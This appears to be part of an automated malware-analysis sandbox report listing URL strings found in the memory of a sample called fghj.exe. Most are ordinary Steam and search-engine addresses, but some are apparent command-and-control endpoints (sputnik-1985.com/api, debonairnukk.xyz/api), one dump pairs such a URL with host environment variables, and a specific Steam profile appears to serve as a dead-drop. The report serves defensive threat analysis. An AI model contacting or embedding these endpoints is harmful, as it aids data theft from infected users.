              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steaxU
              Source: fghj.exe, 00000000.00000002.1613807764.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://debonairnukk.xyz/api
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: fghj.exe, 00000000.00000003.1535169727.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1536020575.00000000039F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: fghj.exeString found in binary or memory: https://sectigo.com/CPS0
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
              Source: fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/&0
              Source: fghj.exe, 00000000.00000003.1535009883.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/.msn
              Source: fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/0
              Source: fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/04
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/6
              Source: fghj.exe, 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/H
              Source: fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/I3
              Source: fghj.exe, 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1613112719.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Y
              Source: fghj.exe, 00000000.00000003.1612725977.0000000000D37000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
              Source: fghj.exe, 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiI
              Source: fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apibm
              Source: fghj.exe, 00000000.00000003.1602938681.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602899349.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602921017.0000000000D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apila
              Source: fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiob
              Source: fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512826189.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/s1&0
              Source: fghj.exe, 00000000.00000003.1602739891.0000000000D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api6Oa2x-M#
              Source: fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/apiUSER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: fghj.exe, 00000000.00000002.1613869748.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512865936.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522479649.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
              Source: fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: fghj.exe, 00000000.00000003.1612997780.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1602739891.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1612725977.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579279388.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1579745618.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1592609795.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000002.1614043108.0000000000D97000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: fghj.exe, 00000000.00000003.1522741143.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1522854880.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512896381.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, fghj.exe, 00000000.00000003.1512778510.0000000000D84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
